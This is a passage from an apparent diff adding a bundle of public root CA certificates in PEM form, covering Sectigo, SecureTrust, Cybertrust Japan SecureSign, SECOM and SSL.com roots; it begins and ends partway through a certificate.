+Ey1TZWN0aWdvIFB1YmxpYyBTZXJ2ZXIgQXV0aGVudGljYXRpb24gUm9vdCBSNDYw +HhcNMjEwMzIyMDAwMDAwWhcNNDYwMzIxMjM1OTU5WjBfMQswCQYDVQQGEwJHQjEY +MBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMTYwNAYDVQQDEy1TZWN0aWdvIFB1Ymxp +YyBTZXJ2ZXIgQXV0aGVudGljYXRpb24gUm9vdCBSNDYwggIiMA0GCSqGSIb3DQEB +AQUAA4ICDwAwggIKAoICAQCTvtU2UnXYASOgHEdCSe5jtrch/cSV1UgrJnwUUxDa +ef0rty2k1Cz66jLdScK5vQ9IPXtamFSvnl0xdE8H/FAh3aTPaE8bEmNtJZlMKpnz +SDBh+oF8HqcIStw+KxwfGExxqjWMrfhu6DtK2eWUAtaJhBOqbchPM8xQljeSM9xf +iOefVNlI8JhD1mb9nxc4Q8UBUQvX4yMPFF1bFOdLvt30yNoDN9HWOaEhUTCDsG3X +ME6WW5HwcCSrv0WBZEMNvSE6Lzzpng3LILVCJ8zab5vuZDCQOc2TZYEhMbUjUDM3 +IuM47fgxMMxF/mL50V0yeUKH32rMVhlATc6qu/m1dkmU8Sf4kaWD5QazYw6A3OAS +VYCmO2a0OYctyPDQ0RTp5A1NDvZdV3LFOxxHVp3i1fuBYYzMTYCQNFu31xR13NgE +SJ/AwSiItOkcyqex8Va3e0lMWeUgFaiEAin6OJRpmkkGj80feRQXEgyDet4fsZfu ++Zd4KKTIRJLpfSYFplhym3kT2BFfrsU4YjRosoYwjviQYZ4ybPUHNs2iTG7sijbt +8uaZFURww3y8nDnAtOFr94MlI1fZEoDlSfB1D++N6xybVCi0ITz8fAr/73trdf+L +HaAZBav6+CuBQug4urv7qv094PPK306Xlynt8xhW6aWWrL3DkJiy4Pmi1KZHQ3xt +zwIDAQABo0IwQDAdBgNVHQ4EFgQUVnNYZJX5khqwEioEYnmhQBWIIUkwDgYDVR0P +AQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAC9c +mTz8Bl6MlC5w6tIyMY208FHVvArzZJ8HXtXBc2hkeqK5Duj5XYUtqDdFqij0lgVQ +YKlJfp/imTYpE0RHap1VIDzYm/EDMrraQKFz6oOht0SmDpkBm+S8f74TlH7Kph52 +gDY9hAaLMyZlbcp+nv4fjFg4exqDsQ+8FxG75gbMY/qB8oFM2gsQa6H61SilzwZA +Fv97fRheORKkU55+MkIQpiGRqRxOF3yEvJ+M0ejf5lG5Nkc/kLnHvALcWxxPDkjB +JYOcCj+esQMzEhonrPcibCTRAUH4WAP+JWgiH5paPHxsnnVI84HxZmduTILA7rpX +DhjvLpr3Etiga+kFpaHpaPi8TD8SHkXoUsCjvxInebnMMTzD9joiFgOgyY9mpFui +TdaBJQbpdqQACj7LzTWb4OE4y2BThihCQRxEV+ioratF4yUQvNs+ZUH7G6aXD+u5 +dHn5HrwdVw1Hr8Mvn4dGp+smWg9WY7ViYG4A++MnESLn/pmPNPW56MORcr3Ywx65 +LvKRRFHQV80MNNVIIb/bE/FmJUNS0nAiNs2fxBx1IK1jcmMGDw4nztJqDby1ORrp +0XZ60Vzk50lJLVU3aPAaOpg+VBeHVOmmJ1CJeyAvP/+/oYtKR5j/K3tJPsMpRmAY +QqszKbrAKbkTidOIijlBO8n9pu0f9GBj39ItVQGL +-----END CERTIFICATE----- + +# Secure Global CA +-----BEGIN CERTIFICATE----- +MIIDvDCCAqSgAwIBAgIQB1YipOjUiolN9BPI8PjqpTANBgkqhkiG9w0BAQUFADBK +MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3QgQ29ycG9yYXRpb24x +GTAXBgNVBAMTEFNlY3VyZSBHbG9iYWwgQ0EwHhcNMDYxMTA3MTk0MjI4WhcNMjkx +MjMxMTk1MjA2WjBKMQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3Qg +Q29ycG9yYXRpb24xGTAXBgNVBAMTEFNlY3VyZSBHbG9iYWwgQ0EwggEiMA0GCSqG +SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCvNS7YrGxVaQZx5RNoJLNP2MwhR/jxYDiJ +iQPpvepeRlMJ3Fz1Wuj3RSoC6zFh1ykzTM7HfAo3fg+6MpjhHZevj8fcyTiW89sa +/FHtaMbQbqR8JNGuQsiWUGMu4P51/pinX0kuleM5M2SOHqRfkNJnPLLZ/kG5VacJ +jnIFHovdRIWCQtBJwB1g8NEXLJXr9qXBkqPFwqcIYA1gBBCWeZ4WNOaptvolRTnI +HmX5k/Wq8VLcmZg9pYYaDDUz+kulBAYVHDGA76oYa8J719rO+TMg1fW9ajMtgQT7 +sFzUnKPiXB3jqUJ1XnvUd+85VLrJChgbEplJL4hL/VBi0XPnj3pDAgMBAAGjgZ0w +gZowEwYJKwYBBAGCNxQCBAYeBABDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFK9EBMJBfkiD2045AuzshHrmzsmkMDQGA1UdHwQtMCsw +KaAnoCWGI2h0dHA6Ly9jcmwuc2VjdXJldHJ1c3QuY29tL1NHQ0EuY3JsMBAGCSsG +AQQBgjcVAQQDAgEAMA0GCSqGSIb3DQEBBQUAA4IBAQBjGghAfaReUw132HquHw0L +URYD7xh8yOOvaliTFGCRsoTciE6+OYo68+aCiV0BN7OrJKQVDpI1WkpEXk5X+nXO +H0jOZvQ8QCaSmGwb7iRGDBezUqXbpZGRzzfTb+cnCDpOGR86p1hcF895P4vkp9Mm +I50mD1hp/Ed+stCNi5O/KU9DaXR2Z0vPB4zmAve14bRDtUstFJ/53CYNv6ZHdAbY +iNE6KTCEztI5gGIbqMdXSbxqVVFnFUq+NQfk1XWYN3kwFNspnWzFacxHVaIw98xc +f8LDmBxrThaA63p4ZUWiABqvDA1VZDRIuJK58bRQKfJPIx/abKwfROHdI3hRW8cW +-----END CERTIFICATE----- + +# SecureSign Root CA12 +-----BEGIN CERTIFICATE----- +MIIDcjCCAlqgAwIBAgIUZvnHwa/swlG07VOX5uaCwysckBYwDQYJKoZIhvcNAQEL +BQAwUTELMAkGA1UEBhMCSlAxIzAhBgNVBAoTGkN5YmVydHJ1c3QgSmFwYW4gQ28u +LCBMdGQuMR0wGwYDVQQDExRTZWN1cmVTaWduIFJvb3QgQ0ExMjAeFw0yMDA0MDgw +NTM2NDZaFw00MDA0MDgwNTM2NDZaMFExCzAJBgNVBAYTAkpQMSMwIQYDVQQKExpD +eWJlcnRydXN0IEphcGFuIENvLiwgTHRkLjEdMBsGA1UEAxMUU2VjdXJlU2lnbiBS +b290IENBMTIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC6OcE3emhF +KxS06+QT61d1I02PJC0W6K6OyX2kVzsqdiUzg2zqMoqUm048luT9Ub+ZyZN+v/mt +p7JIKwccJ/VMvHASd6SFVLX9kHrko+RRWAPNEHl57muTH2SOa2SroxPjcf59q5zd +J1M3s6oYwlkm7Fsf0uZlfO+TvdhYXAvA42VvPMfKWeP+bl+sg779XSVOKik71gur +FzJ4pOE+lEa+Ym6b3kaosRbnhW70CEBFEaCeVESE99g2zvVQR9wsMJvuwPWW0v4J +hscGWa5Pro4RmHvzC1KqYiaqId+OJTN5lxZJjfU+1UefNzFJM3IFTQy2VYzxV4+K +h9GtxRESOaCtAgMBAAGjQjBAMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQD +AgEGMB0GA1UdDgQWBBRXNPN0zwRL1SXm8UC2LEzZLemgrTANBgkqhkiG9w0BAQsF +AAOCAQEAPrvbFxbS8hQBICw4g0utvsqFepq2m2um4fylOqyttCg6r9cBg0krY6Ld +mmQOmFxv3Y67ilQiLUoT865AQ9tPkbeGGuwAtEGBpE/6aouIs3YIcipJQMPTw4WJ +mBClnW8Zt7vPemVV2zfrPIpyMpcemik+rY3moxtt9XUa5rBouVui7mlHJzWhhpmA +8zNL4WukJsPvdFlseqJkth5Ew1DgDzk9qTPxpfPSvWKErI4cqc1avTc7bgoitPQV +55FYxTpE05Uo2cBl6XLK0A+9H7MV2anjpEcJnuDLN/v9vZfVvhgaaaI5gdka9at/ +yOPiZwud9AzqVN/Ssq+xIvEg37xEHA== +-----END CERTIFICATE----- + +# SecureSign Root CA14 +-----BEGIN CERTIFICATE----- +MIIFcjCCA1qgAwIBAgIUZNtaDCBO6Ncpd8hQJ6JaJ90t8sswDQYJKoZIhvcNAQEM +BQAwUTELMAkGA1UEBhMCSlAxIzAhBgNVBAoTGkN5YmVydHJ1c3QgSmFwYW4gQ28u +LCBMdGQuMR0wGwYDVQQDExRTZWN1cmVTaWduIFJvb3QgQ0ExNDAeFw0yMDA0MDgw +NzA2MTlaFw00NTA0MDgwNzA2MTlaMFExCzAJBgNVBAYTAkpQMSMwIQYDVQQKExpD +eWJlcnRydXN0IEphcGFuIENvLiwgTHRkLjEdMBsGA1UEAxMUU2VjdXJlU2lnbiBS +b290IENBMTQwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDF0nqh1oq/ +FjHQmNE6lPxauG4iwWL3pwon71D2LrGeaBLwbCRjOfHw3xDG3rdSINVSW0KZnvOg +vlIfX8xnbacuUKLBl422+JX1sLrcneC+y9/3OPJH9aaakpUqYllQC6KxNedlsmGy +6pJxaeQp8E+BgQQ8sqVb1MWoWWd7VRxJq3qdwudzTe/NCcLEVxLbAQ4jeQkHO6Lo +/IrPj8BGJJw4J+CDnRugv3gVEOuGTgpa/d/aLIJ+7sr2KeH6caH3iGicnPCNvg9J +kdjqOvn90Ghx2+m1K06Ckm9mH+Dw3EzsytHqunQG+bOEkJTRX45zGRBdAuVwpcAQ +0BB8b8VYSbSwbprafZX1zNoCr7gsfXmPvkPx+SgojQlD+Ajda8iLLCSxjVIHvXib +y8posqTdDEx5YMaZ0ZPxMBoH064iwurO8YQJzOAUbn8/ftKChazcqRZOhaBgy/ac +18izju3Gm5h1DVXoX+WViwKkrkMpKBGk5hIwAUt1ax5mnXkvpXYvHUC0bcl9eQjs +0Wq2XSqypWa9a4X0dFbD9ed1Uigspf9mR6XU/v6eVL9lfgHWMI+lNpyiUBzuOIAB +SMbHdPTGrMNASRZhdCyvjG817XsYAFs2PJxQDcqSMxDxJklt33UkN4Ii1+iW/RVL +ApY+B3KVfqs9TC7XyvDf4Fg/LS8EmjijAQIDAQABo0IwQDAPBgNVHRMBAf8EBTAD +AQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUBpOjCl4oaTeqYR3r6/wtbyPk +86AwDQYJKoZIhvcNAQEMBQADggIBAJaAcgkGfpzMkwQWu6A6jZJOtxEaCnFxEM0E +rX+lRVAQZk5KQaID2RFPeje5S+LGjzJmdSX7684/AykmjbgWHfYfM25I5uj4V7Ib +ed87hwriZLoAymzvftAj63iP/2SbNDefNWWipAA9EiOWWF3KY4fGoweITedpdopT +zfFP7ELyk+OZpDc8h7hi2/DsHzc/N19DzFGdtfCXwreFamgLRB7lUe6TzktuhsHS +DCRZNhqfLJGP4xjblJUK7ZGqDpncllPjYYPGFrojutzdfhrGe0K22VoF3Jpf1d+4 +2kd92jjbrDnVHmtsKheMYc2xbXIBw8MgAGJoFjHVdqqGuw6qnsb58Nn4DSEC5MUo +FlkRudlpcyqSeLiSV5sI8jrlL5WwWLdrIBRtFO8KvH7YVdiI2i/6GaX7i+B/OfVy +K4XELKzvGUWSTLNhB9xNH27SgRNcmvMSZ4PPmz+Ln52kuaiWA3rF7iDeM9ovnhp6 +dB7h7sxaOgTdsxoEqBRjrLdHEoOabPXm6RUVkRqEGQ6UROcSjiVbgGcZ3GOTEAtl +Lor6CZpO2oYofaphNdgOpygau1LgePhsumywbrmHXumZNTfxPWQrqaA0k89jL9WB +365jJ6UeTo3cKXhZ+PmhIIynJkBugnLNeLLIjzwec+fBH7/PzqUqm9tEZDKgu39c +JRNItX+S +-----END CERTIFICATE----- + +# SecureSign Root CA15 +-----BEGIN CERTIFICATE----- +MIICIzCCAamgAwIBAgIUFhXHw9hJp75pDIqI7fBw+d23PocwCgYIKoZIzj0EAwMw +UTELMAkGA1UEBhMCSlAxIzAhBgNVBAoTGkN5YmVydHJ1c3QgSmFwYW4gQ28uLCBM +dGQuMR0wGwYDVQQDExRTZWN1cmVTaWduIFJvb3QgQ0ExNTAeFw0yMDA0MDgwODMy +NTZaFw00NTA0MDgwODMyNTZaMFExCzAJBgNVBAYTAkpQMSMwIQYDVQQKExpDeWJl +cnRydXN0IEphcGFuIENvLiwgTHRkLjEdMBsGA1UEAxMUU2VjdXJlU2lnbiBSb290 +IENBMTUwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQLUHSNZDKZmbPSYAi4Io5GdCx4 +wCtELW1fHcmuS1Iggz24FG1Th2CeX2yF2wYUleDHKP+dX+Sq8bOLbe1PL0vJSpSR +ZHX+AezB2Ot6lHhWGENfa4HL9rzatAy2KZMIaY+jQjBAMA8GA1UdEwEB/wQFMAMB +Af8wDgYDVR0PAQH/BAQDAgEGMB0GA1UdDgQWBBTrQciu/NWeUUj1vYv0hyCTQSvT +9DAKBggqhkjOPQQDAwNoADBlAjEA2S6Jfl5OpBEHvVnCB96rMjhTKkZEBhd6zlHp +4P9mLQlO4E/0BdGF9jVg3PVys0Z9AjBEmEYagoUeYWmJSwdLZrWeqrqgHkHZAXQ6 +bkU6iYAZezKYVWOr62Nuk22rGwlgMU4= +-----END CERTIFICATE----- + +# SecureTrust CA +-----BEGIN CERTIFICATE----- +MIIDuDCCAqCgAwIBAgIQDPCOXAgWpa1Cf/DrJxhZ0DANBgkqhkiG9w0BAQUFADBI +MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXU2VjdXJlVHJ1c3QgQ29ycG9yYXRpb24x +FzAVBgNVBAMTDlNlY3VyZVRydXN0IENBMB4XDTA2MTEwNzE5MzExOFoXDTI5MTIz +MTE5NDA1NVowSDELMAkGA1UEBhMCVVMxIDAeBgNVBAoTF1NlY3VyZVRydXN0IENv +cnBvcmF0aW9uMRcwFQYDVQQDEw5TZWN1cmVUcnVzdCBDQTCCASIwDQYJKoZIhvcN +AQEBBQADggEPADCCAQoCggEBAKukgeWVzfX2FI7CT8rU4niVWJxB4Q2ZQCQXOZEz +Zum+4YOvYlyJ0fwkW2Gz4BERQRwdbvC4u/jep4G6pkjGnx29vo6pQT64lO0pGtSO +0gMdA+9tDWccV9cGrcrI9f4Or2YlSASWC12juhbDCE/RRvgUXPLIXgGZbf2IzIao +wW8xQmxSPmjL8xk037uHGFaAJsTQ3MBv396gwpEWoGQRS0S8Hvbn+mPeZqx2pHGj +7DaUaHp3pLHnDi+BeuK1cobvomuL8A/b01k/unK8RCSc43Oz969XL0Imnal0ugBS +8kvNU3xHCzaFDmapCJcWNFfBZveA4+1wVMeT4C4oFVmHursCAwEAAaOBnTCBmjAT +BgkrBgEEAYI3FAIEBh4EAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB +/zAdBgNVHQ4EFgQUQjK2FvoE/f5dS3rD/fdMQB1aQ68wNAYDVR0fBC0wKzApoCeg +JYYjaHR0cDovL2NybC5zZWN1cmV0cnVzdC5jb20vU1RDQS5jcmwwEAYJKwYBBAGC +NxUBBAMCAQAwDQYJKoZIhvcNAQEFBQADggEBADDtT0rhWDpSclu1pqNlGKa7UTt3 +6Z3q059c4EVlew3KW+JwULKUBRSuSceNQQcSc5R+DCMh/bwQf2AQWnL1mA6s7Ll/ +3XpvXdMc9P+IBWlCqQVxyLesJugutIxq/3HcuLHfmbx8IVQr5Fiiu1cprp6poxkm +D5kuCLDv/WnPmRoJjeOnnyvJNjR7JLN4TJUXpAYmHrZkUjZfYGfZnMUFdAvnZyPS +CPyI6a6Lf+Ew9Dd+/cYy2i2eRDAwbO4H3tI0/NL/QPZL9GZGBlSm8jIKYyYwa5vR +3ItHuuG51WLQoqD0ZwV4KWMabwTW+MZMo5qxN7SN5ShLHZ4swrhovO0C7jE= +-----END CERTIFICATE----- + +# Security Communication ECC RootCA1 +-----BEGIN CERTIFICATE----- +MIICODCCAb6gAwIBAgIJANZdm7N4gS7rMAoGCCqGSM49BAMDMGExCzAJBgNVBAYT +AkpQMSUwIwYDVQQKExxTRUNPTSBUcnVzdCBTeXN0ZW1zIENPLixMVEQuMSswKQYD +VQQDEyJTZWN1cml0eSBDb21tdW5pY2F0aW9uIEVDQyBSb290Q0ExMB4XDTE2MDYx +NjA1MTUyOFoXDTM4MDExODA1MTUyOFowYTELMAkGA1UEBhMCSlAxJTAjBgNVBAoT +HFNFQ09NIFRydXN0IFN5c3RlbXMgQ08uLExURC4xKzApBgNVBAMTIlNlY3VyaXR5 +IENvbW11bmljYXRpb24gRUNDIFJvb3RDQTEwdjAQBgcqhkjOPQIBBgUrgQQAIgNi +AASkpW9gAwPDvTH00xecK4R1rOX9PVdu12O/5gSJko6BnOPpR27KkBLIE+Cnnfdl +dB9sELLo5OnvbYUymUSxXv3MdhDYW72ixvnWQuRXdtyQwjWpS4g8EkdtXP9JTxpK +ULGjQjBAMB0GA1UdDgQWBBSGHOf+LaVKiwj+KBH6vqNm+GBZLzAOBgNVHQ8BAf8E +BAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAKBggqhkjOPQQDAwNoADBlAjAVXUI9/Lbu +9zuxNuie9sRGKEkz0FhDKmMpzE2xtHqiuQ04pV1IKv3LsnNdo4gIxwwCMQDAqy0O +be0YottT6SXbVQjgUMzfRGEWgqtJsLKB7HOHeLRMsmIbEvoWTSVLY70eN9k= +-----END CERTIFICATE----- + +# Security Communication RootCA2 +-----BEGIN CERTIFICATE----- +MIIDdzCCAl+gAwIBAgIBADANBgkqhkiG9w0BAQsFADBdMQswCQYDVQQGEwJKUDEl +MCMGA1UEChMcU0VDT00gVHJ1c3QgU3lzdGVtcyBDTy4sTFRELjEnMCUGA1UECxMe +U2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBSb290Q0EyMB4XDTA5MDUyOTA1MDAzOVoX +DTI5MDUyOTA1MDAzOVowXTELMAkGA1UEBhMCSlAxJTAjBgNVBAoTHFNFQ09NIFRy +dXN0IFN5c3RlbXMgQ08uLExURC4xJzAlBgNVBAsTHlNlY3VyaXR5IENvbW11bmlj +YXRpb24gUm9vdENBMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAV +OVKxUrO6xVmCxF1SrjpDZYBLx/KWvNs2l9amZIyoXvDjChz335c9S672XewhtUGr +zbl+dp+++T42NKA7wfYxEUV0kz1XgMX5iZnK5atq1LXaQZAQwdbWQonCv/Q4EpVM +VAX3NuRFg3sUZdbcDE3R3n4MqzvEFb46VqZab3ZpUql6ucjrappdUtAtCms1FgkQ +hNBqyjoGADdH5H5XTz+L62e4iKrFvlNVspHEfbmwhRkGeC7bYRr6hfVKkaHnFtWO +ojnflLhwHyg/i/xAXmODPIMqGplrz95Zajv8bxbXH/1KEOtOghY6rCcMU/Gt1SSw +awNQwS08Ft1ENCcadfsCAwEAAaNCMEAwHQYDVR0OBBYEFAqFqXdlBZh8QIH4D5cs +OPEK7DzPMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3 +DQEBCwUAA4IBAQBMOqNErLlFsceTfsgLCkLfZOoc7llsCLqJX2rKSpWeeo8HxdpF +coJxDjrSzG+ntKEju/Ykn8sX/oymzsLS28yN/HH8AynBbF0zX2S2ZTuJbxh2ePXc +okgfGT+Ok+vx+hfuzU7jBBJV1uXk3fs+BXziHV7Gp7yXT2g69ekuCkO2r1dcYmh8 +t/2jioSgrGK+KwmHNPBqAbubKVY8/gA3zyNs8U6qtnRGEmyR7jTV7JqR50S+kDFy +1UkC9gLl9B/rfNmWVan/7Ir5mUf/NVoCqgTLiluHcSmRvaS0eg29mvVXIwAHIRc/ +SjnRBUkLp7Y3gaVdjKozXoEofKd9J+sAro03 +-----END CERTIFICATE----- + +# SSL.com EV Root Certification Authority ECC +-----BEGIN CERTIFICATE----- +MIIClDCCAhqgAwIBAgIILCmcWxbtBZUwCgYIKoZIzj0EAwIwfzELMAkGA1UEBhMC +VVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQKDA9T +U0wgQ29ycG9yYXRpb24xNDAyBgNVBAMMK1NTTC5jb20gRVYgUm9vdCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eSBFQ0MwHhcNMTYwMjEyMTgxNTIzWhcNNDEwMjEyMTgx +NTIzWjB/MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hv +dXN0b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjE0MDIGA1UEAwwrU1NMLmNv +bSBFViBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IEVDQzB2MBAGByqGSM49 +AgEGBSuBBAAiA2IABKoSR5CYG/vvw0AHgyBO8TCCogbR8pKGYfL2IWjKAMTH6kMA +VIbc/R/fALhBYlzccBYy3h+Z1MzFB8gIH2EWB1E9fVwHU+M1OIzfzZ/ZLg1Kthku +WnBaBu2+8KGwytAJKaNjMGEwHQYDVR0OBBYEFFvKXuXe0oGqzagtZFG22XKbl+ZP +MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUW8pe5d7SgarNqC1kUbbZcpuX +5k8wDgYDVR0PAQH/BAQDAgGGMAoGCCqGSM49BAMCA2gAMGUCMQCK5kCJN+vp1RPZ +ytRrJPOwPYdGWBrssd9v+1a6cGvHOMzosYxPD/fxZ3YOg9AeUY8CMD32IygmTMZg +h5Mmm7I1HrrW9zzRHM76JTymGoEVW/MSD2zuZYrJh6j5B+BimoxcSg== +-----END CERTIFICATE----- + +# SSL.com EV Root Certification Authority RSA R2 +-----BEGIN CERTIFICATE----- +MIIF6zCCA9OgAwIBAgIIVrYpzTS8ePYwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNV +BAYTAlVTMQ4wDAYDVQQIDAVUZXhhczEQMA4GA1UEBwwHSG91c3RvbjEYMBYGA1UE +CgwPU1NMIENvcnBvcmF0aW9uMTcwNQYDVQQDDC5TU0wuY29tIEVWIFJvb3QgQ2Vy +dGlmaWNhdGlvbiBBdXRob3JpdHkgUlNBIFIyMB4XDTE3MDUzMTE4MTQzN1oXDTQy +MDUzMDE4MTQzN1owgYIxCzAJBgNVBAYTAlVTMQ4wDAYDVQQIDAVUZXhhczEQMA4G +A1UEBwwHSG91c3RvbjEYMBYGA1UECgwPU1NMIENvcnBvcmF0aW9uMTcwNQYDVQQD +DC5TU0wuY29tIEVWIFJvb3QgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgUlNBIFIy +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAjzZlQOHWTcDXtOlG2mvq +M0fNTPl9fb69LT3w23jhhqXZuglXaO1XPqDQCEGD5yhBJB/jchXQARr7XnAjssuf +OePPxU7Gkm0mxnu7s9onnQqG6YE3Bf7wcXHswxzpY6IXFJ3vG2fThVUCAtZJycxa +4bH3bzKfydQ7iEGonL3Lq9ttewkfokxykNorCPzPPFTOZw+oz12WGQvE43LrrdF9 +HSfvkusQv1vrO6/PgN3B0pYEW3p+pKk8OHakYo6gOV7qd89dAFmPZiw+B6KjBSYR +aZfqhbcPlgtLyEDhULouisv3D5oi53+aNxPN8k0TayHRwMwi8qFG9kRpnMphNQcA +b9ZhCBHqurj26bNg5U257J8UZslXWNvNh2n4ioYSA0e/ZhN2rHd9NCSFg83XqpyQ +Gp8hLH94t2S42Oim9HizVcuE0jLEeK6jj2HdzghTreyI/BXkmg3mnxp3zkyPuBQV +PWKchjgGAGYS5Fl2WlPAApiiECtoRHuOec4zSnaqW4EWG7WK2NAAe15itAnWhmMO +pgWVSbooi4iTsjQc2KRVbrcc0N6ZVTsj9CLg+SlmJuwgUHfbSguPvuUCYHBBXtSu +UDkiFCbLsjtzdFVHB3mBOagwE0TlBIqulhMlQg+5U8Sb/M3kHN48+qvWBkofZ6aY +MBzdLNvcGJVXZsb/XItW9XcCAwEAAaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAfBgNV +HSMEGDAWgBT5YLvU49U09rj1BoAlp3PbRmmonjAdBgNVHQ4EFgQU+WC71OPVNPa4 +9QaAJadz20ZpqJ4wDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3DQEBCwUAA4ICAQBW +s47LCp1Jjr+kxJG7ZhcFUZh1++VQLHqe8RT6q9OKPv+RKY9ji9i0qVQBDb6Thi/5 +Sm3HXvVX+cpVHBK+Rw82xd9qt9t1wkclf7nxY/hoLVUE0fKNsKTPvDxeH3jnpaAg +cLAExbf3cqfeIg29MyVGjGSSJuM+LmOW2puMPfgYCdcDzH2GguDKBAdRUNf/ktUM +79qGn5nX67evaOI5JpS6aLe/g9Pqemc9YmeuJeVy6OLk7K4S9ksrPJ/psEDzOFSz +/bdoyNrGj1E8svuR3Bznm53htw1yj+KkxKl4+esUrMZDBcJlOSgYAsOCsp0FvmXt +ll9ldDz7CTUue5wT/RsPXcdtgTpWD8w74a8CLyKsRspGPKAcTNZEtF4uXBVmCeEm +Kf7GUmG6sXP/wwyc5WxqlD8UykAWlYTzWamsX0xhk23RO8yilQwipmdnRC652dKK +QbNmC1r7fSOl8hqw/96bg5Qu0T/fkreRrwU7ZcegbLHNYhLDkBvjJc40vG93drEQ +w/cFGsDWr3RiSBd3kmmQYRzelYB0VI8YHMPzA9C/pEN1hlMYegouCRw2n5H9gooi +S9EOUCXdywMMF8mDAAhONU2Ki+3wApRmLER/y5UnlhetCTCstnEXbosX9hwJ1C07 +mKVx01QT2WDz9UtmT/rx7iASjbSsV7FFY6GsdqnC+w== +-----END CERTIFICATE----- + +# SSL.com Root Certification Authority ECC +-----BEGIN CERTIFICATE----- +MIICjTCCAhSgAwIBAgIIdebfy8FoW6gwCgYIKoZIzj0EAwIwfDELMAkGA1UEBhMC +VVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQKDA9T +U0wgQ29ycG9yYXRpb24xMTAvBgNVBAMMKFNTTC5jb20gUm9vdCBDZXJ0aWZpY2F0 +aW9uIEF1dGhvcml0eSBFQ0MwHhcNMTYwMjEyMTgxNDAzWhcNNDEwMjEyMTgxNDAz +WjB8MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hvdXN0 +b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjExMC8GA1UEAwwoU1NMLmNvbSBS +b290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IEVDQzB2MBAGByqGSM49AgEGBSuB +BAAiA2IABEVuqVDEpiM2nl8ojRfLliJkP9x6jh3MCLOicSS6jkm5BBtHllirLZXI +7Z4INcgn64mMU1jrYor+8FsPazFSY0E7ic3s7LaNGdM0B9y7xgZ/wkWV7Mt/qCPg +CemB+vNH06NjMGEwHQYDVR0OBBYEFILRhXMw5zUE044CkvvlpNHEIejNMA8GA1Ud +EwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUgtGFczDnNQTTjgKS++Wk0cQh6M0wDgYD +VR0PAQH/BAQDAgGGMAoGCCqGSM49BAMCA2cAMGQCMG/n61kRpGDPYbCWe+0F+S8T +kdzt5fxQaxFGRrMcIQBiu77D5+jNB5n5DQtdcj7EqgIwH7y6C+IwJPt8bYBVCpk+ +gA0z5Wajs6O7pdWLjwkspl1+4vAHCGht0nxpbl/f5Wpl +-----END CERTIFICATE----- + +# SSL.com Root Certification Authority RSA +-----BEGIN CERTIFICATE----- +MIIF3TCCA8WgAwIBAgIIeyyb0xaAMpkwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UE +BhMCVVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQK +DA9TU0wgQ29ycG9yYXRpb24xMTAvBgNVBAMMKFNTTC5jb20gUm9vdCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eSBSU0EwHhcNMTYwMjEyMTczOTM5WhcNNDEwMjEyMTcz +OTM5WjB8MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hv +dXN0b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjExMC8GA1UEAwwoU1NMLmNv +bSBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IFJTQTCCAiIwDQYJKoZIhvcN +AQEBBQADggIPADCCAgoCggIBAPkP3aMrfcvQKv7sZ4Wm5y4bunfh4/WvpOz6Sl2R +xFdHaxh3a3by/ZPkPQ/CFp4LZsNWlJ4Xg4XOVu/yFv0AYvUiCVToZRdOQbngT0aX +qhvIuG5iXmmxX9sqAn78bMrzQdjt0Oj8P2FI7bADFB0QDksZ4LtO7IZl/zbzXmcC +C52GVWH9ejjt/uIZALdvoVBidXQ8oPrIJZK0bnoix/geoeOy3ZExqysdBP+lSgQ3 +6YWkMyv94tZVNHwZpEpox7Ko07fKoZOI68GXvIz5HdkihCR0xwQ9aqkpk8zruFvh +/l8lqjRYyMEjVJ0bmBHDOJx+PYZspQ9AhnwC9FwCTyjLrnGfDzrIM/4RJTXq/LrF +YD3ZfBjVsqnTdXgDciLKOsMf7yzlLqn6niy2UUb9rwPW6mBo6oUWNmuF6R7As93E +JNyAKoFBbZQ+yODJgUEAnl6/f8UImKIYLEJAs/lvOCdLToD0PYFH4Ih86hzOtXVc 